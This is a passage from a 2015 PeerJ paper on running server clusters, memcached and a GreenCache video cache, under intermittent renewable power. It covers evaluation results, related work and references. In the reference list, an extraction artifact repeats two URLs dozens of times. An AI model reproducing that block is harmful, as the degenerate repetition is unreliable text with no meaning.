servers as power varies, whereas the load-proportional policy distributes the power to servers in proportion to their popularity. Similar to the load-proportional policy, the activation policy also migrates popular chunks to active servers while deactivating servers due to the drop in the power level. Unlike the proposed staggered load-proportional policy, the load-proportional policy does not replicate video chunks because it does not benefit from replication as it activates all servers at the same time every blink interval. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 39/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 24 Buffering time at various steady and oscillating power levels. (A) Steady power. (B) Oscillat- ing power. Figure 24A shows the average buffering time at different steady power levels. As expected, the activation policy performs better than the load-proportional policy at low power levels since, unlike the load-proportional policy, the activation policy does not incur the blinking overhead, which becomes significant in comparison to the active interval at low power levels. However, at moderate to high steady power levels, the benefit of a larger cache size, albeit blinking, dominates the blinking overhead for real-world traces. Furthermore, the buffering time decreases significantly if first chunks are replicated on all servers. Even at low power levels, replication of initial chunks significantly reduces the buffering time, while still leveraging the benefits of a larger cache size. Moreover, the performance of the staggered load-proportional policy remains almost the same at all power levels. As video popularity changes infrequently, migration overheads in our experiments are modest (∼2%). Figure 24B compares the average buffering time for the above policies at different oscillating power levels. We oscillate available power every five minutes. Since migration overhead of the staggered proportional policy is independent of power level, its perfor- mance remains almost the same at all oscillation levels. However, the activation policy incurs migration overhead whenever the number of active servers decreases. Consequently, the activation policy performs poorly at high oscillation levels, as indicated in the figure. Though replication of initial chunks reduces the buffering time at all power levels, it is primarily required at low power levels. Next, we evaluate the benefits of prefetching initial chunks of related videos. As Fig. 25 indicates, prefetching initial chunks of the top five videos reduces the buffering time by 10% as compared to no prefetching. Further, since prefetching more videos doesn’t improve the buffering time, we limit the cache to prefetching only first chunks of top few videos from the related list. We choose to prefetch top five videos only in order to strike a balance between the performance gain and prefetching overhead. Case study To experiment with our WiMAX base station using a real WiMAX client, we use a Linux Desktop with Intel Atom CPU N270 processor and 1 GB RAM connected to Teltonika USB WiMAX Modem. We disable all network interfaces except the WiMAX interface. The Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 40/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 25 Buffering time decreases as the number of prefetched videos (first chunk only) from related lists increases. desktop connects to the WiMAX base station (NEC Rel.1 802.16eBS), which we configure to route all video requests from the desktop to the proxy. We replay the same 3 h YouTube trace on the WiMAX client, but we use real power traces from our solar/wind deployment, as described in the previous section, to power the GreenCache cluster. Figure 26 plots average buffering time, calculated every five minutes, for three blinking policies: activation, load proportional, and staggered load proportional with first chunks replicated. As expected, the performance of all three policies goes down (buffering time goes up) when the available power drops down, and vice versa. However, the performance of activation degrades more than that of load-proportional when the available power drops down, since the activation policy incurs migration overhead when the number of active servers decreases. Further, replicating first chunks significantly reduces the buffering time for the staggered load-proportional policy at all power levels. Since the migration overhead of the staggered load-proportional policy is independent of power levels, its performance does not vary much, not even when the available power changes significantly, if first chunks are replicated. GreenCache scalability Next, we use the Blink emulator to study how GreenCache performs on a cluster of 1,000 nodes for the YouTube dataset and user request trace described above. We run all Blink and GreenCache modules as described above, and use the benchmark results to set the throughput, access latency, and power consumption of servers. Figures 27A and 27B show the average latency and bandwidth, respectively, at various power levels. As expected, both the average latency and bandwidth cost reduce with increasing power levels as the number of active nodes or the total cache size increases with the power level. Figure 28A shows the buffering time for the aforementioned blinking policies at three different steady power levels. As expected, the staggered load-proportional policy performs best at all power levels due to the replication of first chunk of all videos. The Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 41/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 26 Buffering time at various power levels for our combined solar/wind power trace. Figure 27 Latency and bandwidth cost on 1,000 node cluster for YouTube video requests with steady available power. (A) Average latency in video requests. (B) Average bandwidth cost in video requests. load-proportional policy recalculates the popularity of chunks every 5,000 requests and migrates popular chunks to mostly active servers. Comparing Figs. 24A and 28A it is evident that the relative performance of different policies does not vary much with the cluster size. Similarly, Figs. 24B and 28B indicates that all three blinking policies give similar performance (or relative performance) for a small as well as a large cluster. RELATED WORK The sensor network community has studied strategies for dealing with variable sources of renewable power, since these systems often do not have access to the power grid. However, since sensor networks are geographically distributed, each node must harvest its own energy, resulting in network-wide energy imbalances (Fan, Zheng & Sinha, 2008), whereas Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 42/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 28 Buffering time with activation policy, load proportional policy, and staggered load propor- tional policy. (A) Steady power. Oscillating power. data center nodes share a common power delivery infrastructure. Further, the primary performance metric for a sensor network is the amount of data the network collects. As a result, much of the energy harvesting work is not directly applicable to data centers. Similarly, mobile computing generally focuses on extending battery life by regulating power consumption (Zeng et al., 2002), rather than modulating performance to match energy production. The increasing energy consumption of data centers (US Environmental Protection Agency, 2007) has led companies to invest heavily in renewable energy sources (Miller, 2008; Stone, 2007). For example, the goal of Google’s RE < C initiative is to make large-scale renewable power generation cheaper than coal-based production. As a result, researchers have started to study how to incorporate renewables into a data center’s power delivery infrastructure (Stewart & Shen, 2009). As one example, Lee et al. (2010) use request redirection to control the carbon footprint of data centers by redirecting load to servers powered by renewable energy sources. While not directly related to energy harvesting, Power Routing (Pelley et al., 2010) proposes shuffled power delivery topologies that allow data centers to control how much power each rack receives. While the topologies are well-suited for delivering variable amounts of power to racks based on aggregate demand, they are also useful for flexible routing of a variable power supply. Prior research on workload-driven approaches to improve data center energy efficiency is orthogonal to our work. Examples include designing platforms that balance CPU and I/O capacity (Anderson et al., 2009; Rivoire et al., 2008), routing requests to locations with the cheapest energy (Qureshi et al., 2009), and dynamically activating and deactivating nodes as demand rises and falls (Chase et al., 2001; Tolia et al., 2008; Krioukov et al., 2010). PowerNap’s node-level energy proportional technique has also been viewed as a workload-driven optimization (Meisner, Gold & Wenisch, 2009). We show that a similar technique is useful for controlling per-node power consumption in a power-driven system. Power capping has also been studied previously in data centers to ensure collections of nodes do not exceed a worst-case power budget (Ranganathan et al., 2006; Fan, Weber & Barroso, 2007b). However, the work assumes exceeding the power budget is a rare transient event that does not warrant application-specific modifications, and that traditional Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 43/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 power management techniques, e.g., DVFS, are capable of enforcing the budget. These assumptions may not hold in many scenarios with intermittent power constraints, as with our renewable energy power source. Gandhi et al. (2009) cap CPU power by forcing CPU idle periods. While similar, blinking focuses on capping per-node power where the CPU is only one component of the total power draw. Improving the energy-efficiency of storage is also a related research area. While Memcached does not offer persistent storage, our modifications for blinking adapt similar ideas from prior storage research, such as migrating popular objects to more active nodes (Pinheiro & Bianchini, 2004; Zhu et al., 2005a). Additionally, power-aware caching algorithms focus on maximizing the idle time between disk accesses to reduce disk power consumption, while our work focus on controlling the power consumption of the cache itself (Zhu et al., 2005b). Blinking introduces regulated churn into data center applications as nodes switch from the active to inactive state. Churn has been well-studied in decentralized, self-organizing distributed hash tables (Stoica et al., 2001). However, the type of churn experienced by DHTs is different than the churn caused by blinking, which motivates our different approach to the problem. In the former case, nodes arrive and depart unexpectedly based on autonomous user behavior and network conditions, while in the latter case, nodes switch between the active and inactive states in a regular and controllable fashion. RAMCloud (Ousterhout et al., 2009) proposes using memory for low-latency persistent storage, and cites as motivation the increasingly large memcached clusters used in production data centers. The use of caches to improve the performance of multimedia distribution systems has been studied extensively in the past two decades. Tang, Xu & Chanson (2005) gives a general overview on existing multimedia caching techniques. Due to the vast amount of exiting work in this area, we only focus on the work closely related to our approach, although, to the best of our knowledge, there is no existing work that directly addresses multimedia caches for intermittent power. Wu, Yu & Wolf (2001) were among the first to propose the caching of chunks (segments) of a video. In contrast to our approach chunks are not equal in size and increase exponentially with the distance from the start of the video. The intention of this approach is to combine the number of consecutive chunks that are cached with the popularity of the video. E.g., for a very popular video all chunks would be stored on the cache while for less popular chunks only a certain number of the initial chunks of the video would be cached. Letting the chunk size grow exponentially has the advantage that the initial chunks of many videos can be stored without occupying too much of the caches storage space. Having only one or several initial chunks of a video stored on the cache bears the advantage that a requested video can be streamed to the client and played out without significant delay. Missing chunks can be streamed from the server immediately after the initial client request to allow for a smooth play out. In contrast to the approach presented by Wu et al., we decided for a scheme that splits all videos in equal sized chunks (except for the very last chunk) where the complete chunk can be transmitted to the client in a period that is equal or smaller than the blink interval, assuming a minimum transmission rate. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 44/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 A more restrictive version of the caching of video chunks is the caching of the first chunk (prefix) only, which was introduced by Sen, Rexford & Towsley (1999). The sole goal of this approach is to reduce the buffer time at the client, since the first chunk can be streamed from the cache much faster than from a remote server. Our initial work on prefix prefetching of videos listed on YouTube’s related video list (Khemmarart et al., 2011) is based on this approach, but proactively prefetches prefixes instead of caching them. As we have shown in Khemmarart et al. (2011), prefix prefetching can significantly improve the viewer’s experience of watching videos and this motivated us to investigate how the prefetching approach performs on a multimedia cache for intermittent power. The results presented above show that prefix prefetching can improve the experience of a viewer also in the case of a blinking multimedia cache. As in our current work, trace-based driven simulations are also used in Cha et al. (2007) and Zink et al. (2009) to investigate the effectiveness of caching for YouTube videos. Both investigations show that caching of YouTube video can both, on a global and regional level, reduce server and network load significantly. In contrast to the work presented in this paper, both studies do not consider scenarios in which power for the caches is intermittent. APPLICABILITY OF BLINKING While we apply blinking to two distributed applications in this paper, we believe blinking is applicable to other applications with intermittent power constraints. There are a range of scenarios beyond renewable energy where imposing intermittent constraints may be attractive. For example, data centers may wish to participate in automated demand-response programs with the electric grid. Automated demand-response, which is a cornerstone of a future smart electric grid, decreases power levels at participating consumers when the electric grid is under stress in exchange for lower power rates. Data centers are well-positioned to benefit from automated demand-response, since servers, as opposed to other types of electrical appliances, already include sophisticated power management mechanisms and are remotely programmable. Blink simply uses these pre-existing mechanisms to gracefully scale application performance as power varies. Additionally, data centers consume significant quantities of power, and demand-response programs typically target large power consumers first. Thus, addressing intermittent constraints in data centers may contribute to a more flexible and efficient electric grid. In addition to automated demand-response programs, data center operators may wish to cap energy bills or power consumption at a fixed level for a variety of reasons, which also imposes intermittent power constraints. For instance, capping energy bills imposes variable power constraints when energy prices vary, as with wholesale energy prices which vary at intervals as low as every 5 min (Qureshi et al., 2009). Thus, as market prices vary, the amount of power a fixed budget purchases will also vary. Capping power is also necessary during “brownout” scenarios, more common in developing countries, where the electric grid is not always able to fully meet demand. Further, Ranganathan et al. (2006), as well as others (Fan, Weber & Barroso, 2007b), point out the benefits of oversubscribing a data Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 45/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 center’s power delivery infrastructure, including the possibility of using dense clusters of lower-cost, but higher-power, components and then capping power to prevent damage. Finally, we believe blinking is applicable to applications beyond memcached and multimedia cache. As with caches, applying blinking will likely require application-level modifications to handle regular and periodic disconnections. One particularly interesting case is leveraging blinking to run distributed storage systems under intermittent power constraints, such as in “brownout” scenarios. Persistent storage presents a different problem than caches, since there is not an alternative always-on option to fallback on to retrieve data. While we measure the performance of distributed caches primarily as a function of hit rate, a blinking storage system’s performance is primarily a measure of data availability, including both the latency and throughput to access data. As a result, a blinking storage system may need to judiciously replicate data to increase availability and ensure consistency across replicas, despite regular and frequent node transitions between the active and inactive states. CONCLUSION In this paper, we focus on managing server clusters running on intermittent power. We propose blinking as the primary abstraction for handling intermittent power constraints, and define multiple types of blinking policies. We then design an application-independent platform for developing and evaluating blinking applications, and use it to perform an in-depth study of the effects of blinking on two distributed applications—memcached and multimedia cache—for various power signals. We find that while an activation policy with key migration results in the best hit rates, it does not distribute the benefits of the cache equally among equally popular objects. As in-memory caches continue grow in size, they will store a greater fraction of equally popular objects for Zipf-like object popularity distributions. We propose and evaluate an asymmetric load-proportional policy to increase fairness without significantly sacrificing the cache’s hit rate. We then propose a staggered load-proportional policy that staggers the start time of servers to maximize the availability of at least one active server. Staggering the start time in conjunction with first chunk replication improves the performance of a multimedia cache, but it does not improve that of memcached because it is a key-value storage system and, unlike the multimedia cache, it does not stream data. We are currently studying how blinking applies to other types of data center applications, including distributed storage layers and data-intensive batch systems. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was supported in part by NSF grants CNS-1117221, CNS-0916577, EEC-0313747, CNS-0855128, and CNS-0834243. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 46/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Grant Disclosures The following grant information was disclosed by the authors: NSF: CNS-1117221, CNS-0916577, EEC-0313747, CNS-0855128, CNS-0834243. Competing Interests Prashant Shenoy is an Academic Editor for PeerJ Computer Science. Dilip Krishnappa is an employee of Akamai Technologies. Author Contributions • Navin Sharma conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • Dilip Krishnappa and Sean Barker conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • David Irwin and Prashant Shenoy conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The research in this article did not generate any raw data. REFERENCES Agarwal Y, Hodges S, Chandra R, Scott J, Bahl P, Gupta R. 2009. Somniloquy: augmenting network interfaces to reduce PC energy usage. In: Proceedings of the conference on networked systems design and implementation. Berkeley: USENIX, 365–380. Ahmad F, Vijaykumar T. 2010. Joint optimization of idle and cooling power in data centers while maintaining response time. In: Proceedings of the conference on architectural support for programming languages and operating systems. New York: ACM, 243–256. Anderson D, Franklin J, Kaminsky M, Phanishayee A, Tan L, Vasudevan V. 2009. FAWN: a fast array of wimpy nodes. In: Proceedings of the symposium on operating systems principles. New York: ACM, 1–14. Balshe W. 2011. Power system considerations for cell tower applications. Available at http://www. cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf. Barroso L, Hölzle U. 2007. The case for energy-proportional computing. Computer 40(12):33–37 DOI 10.1109/MC.2007.443. Breslau L, Cao P, Fan L, Phillips G, Shenker S. 1999. Web caching and Zipf-like distributions: evidence and implications. In: Proceedings of the international conference on computer communications. Piscataway: IEEE, 126–134. Cha M, Kwak H, Rodriguez P, Ahn Y, Moon S. 2007. I tube, you tube, everybody tubes: analyzing the world’s largest user generated content video system. In: IMC 2007. New York: ACM, 1–14. Available at http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf. Chase J, Anderson D, Thakar P, Vahdat A, Doyle R. 2001. Managing energy and server resources in hosting centres. In: Proceedings of the symposium on operating systems principles. New York: ACM, 103–116. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 47/50 https://peerj.com/computer-science/ http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/PT-9019-Cell-Tower-Applications-en.pdf http://dx.doi.org/10.1109/MC.2007.443 http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://an.kaist.ac.kr/traces/papers/imc131-cha.pdf http://dx.doi.org/10.7717/peerj-cs.34 Cohen I, Chase J, Goldszmidt M, Kelly T, Symons J. 2004. Correlating instrumentation data to system states: a building block for automated diagnosis and control. In: Proceedings of the symposium on operating system design and implementation. Berkeley: USENIX, 231–234. DeCandia G, Hastorun D, Jampani M, Kakulapati G, Lakshman A, Pilchin A, Sivasubrama- nian S, Vosshall P, Vogels W. 2007. Dynamo: amazon’s highly available key-value store. In: Proceedings of the symposium on operating systems principles. New York: ACM, 205–220. Elevate Energy. 2011. Dynamic pricing and smart grid. Available at http://www.cntenergy.org/ pricing. Endace. 2011. Endace DAG network monitoring interface. Available at http://www.endace.com/. Erman J, Gerber A, Ramadrishnan KK, Sen S, Spatscheck O. 2011. Over the top video: the gorilla in cellular networks. In: Proceedings of the 2011 ACM SIGCOMM conference on internet measurement conference, IMC ’11. New York: ACM, 127–136. Fan X, Weber W, Barroso L. 2007a. Power provisioning for a warehouse-sized computer. In: Proceedings of the ACM international symposium on computer architecture. New York: ACM. Fan X, Weber W, Barroso L. 2007b. Power provisioning for a warehouse-sized computer. In: Proceedings of the ACM international symposium on computer architecture. New York, Piscataway: ACM, IEEE, 13–23. Fan K, Zheng Z, Sinha P. 2008. Steady and fair rate allocation for rechargeable sensors in perpetual sensor networks. In: Proceedings of the conference on embedded networked sensor systems. New York: ACM, 239–252. Gandhi A, Harchol-Balter M, Das R, Kephart J, Lefurgy C. 2009. Power capping via forced idleness. In: Proceedings of the workshop on energy-efficient design. New York: ACM. Guay J. 2012. India: forget the grid, community power is here. Available at http://ourworld.unu. edu/en/india-forget-the-grid-community-power-is-here/. Gupta P. 2010. Google to use wind energy to power data centers. Reuteurs. Available at http:// www.reuters.com/article/us-google-windpower-idUSTRE66J3BL2010072. Hamilton J. 2010. Overall data center costs. Available at http://perspectives.mvdirona.com/. Khemmarart S, Zhou R, Gao L, Zink M. 2011. Watching user generated videos with prefetching. In: MMSys. New York: ACM, 187–198. Kontorinis V, Zhang L, Aksanli B, Sampson J, Homayoun H, Pettis E, Tullsen D, Rosing T. 2012. Managing distributed UPS energy for effective power capping in data centers. In: International symposium on computer architecture (ISCA). New York: ACM, 488–499. Krioukov A, Mohan P, Alspaugh S, Keys L, Culler D, Katz R. 2010. NapSAC: design and implementation of a power-proportional web cluster. In: Proceedings of the workshop on green networking. New York: ACM. Lee K, Bilgir O, Bianchini R, Martonosi M, Nguyen T. 2010. Managing the cost, energy consumption, and carbon footprint of internet services. In: Proceedings of the SIGMETRICS conference. New York: ACM. Le Sueur E, Heiser G. 2010. Dynamic voltage and frequency scaling: the laws of diminishing returns. In: Proceedings of the workshop on power aware computing and systems. 